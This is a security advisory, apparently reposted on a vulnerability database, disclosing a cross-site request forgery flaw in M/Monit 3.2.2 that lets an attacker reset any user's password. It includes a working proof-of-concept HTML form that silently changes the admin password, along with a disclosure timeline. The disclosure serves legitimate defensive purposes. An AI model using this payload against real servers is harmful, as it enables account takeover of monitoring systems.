| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| M/Monit 3.2.2 Cross Site Request Forgery Vulnerability | 20 Sep 201400:00 | – | zdt | |
| CVE-2014-6409 | 6 Oct 201423:00 | – | cve | |
| CVE-2014-6607 | 6 Oct 201423:00 | – | cve | |
| CVE-2014-6409 | 6 Oct 201423:00 | – | cvelist | |
| CVE-2014-6607 | 6 Oct 201423:00 | – | cvelist | |
| EUVD-2014-6289 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2014-6486 | 7 Oct 202500:30 | – | euvd | |
| CVE-2014-6409 | 6 Oct 201423:55 | – | nvd | |
| CVE-2014-6607 | 6 Oct 201423:55 | – | nvd | |
| Cross site request forgery (csrf) | 6 Oct 201423:55 | – | prion |
`Application: M/Monit 3.2.2
Author: Dolev Farhi @dolevff
Date: 13.9.2014
Relevant CVEs: CVE-2014-6409, CVE-2014-6607
Vulnerable version: <= 3.2.2
M/Monit is an Easy, proactive monitoring of Unix systems, network and
cloud services.
1. Vulnerability Description:
Account hijack via cross-site request forgery (CVE-2014-6409,
CVE-2014-6607)
It was found that M/Monit latest version is vulnerable to CSRF attacks.
it is possible to reset the password of any user account (admin/user)
on the system without needing to know the current password of the
attacked account, due to missing password change verification mechanism.
2. Proof of concept
<html> <div align="center"> <pre> <h2> CSRF poc M/monit </h2> <body>
<form action="http://mmonit_server:8080/admin/users/update"
method="POST"> <input type="hidden" name="fullname"
value="Administrator" /> <input type="hidden" name="password"
value="attacker_pass" /> <input type="hidden" name="email"
value="[email protected]" /> <input type="hidden" name="admin"
value="on" /> <input type="hidden" name="uname" value="admin" /> <input
type="submit" name="submit" value="submit" /> </form> </body> </div>
</html>
3. Mitigation
Software vendor confirmed the issue, and a fix might be released in the
future.
4. Time line:
15.9 - Found vulnerabilities
15.9 - Notified software vendor
15.9 - CVE Requested
17.9 - CVEs Assigned
18.9 - Vendor confirmed security issues,
release will be released in the future
19.9 - public disclosure
- Discovered by Dolev Farhi, F5 Networks
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation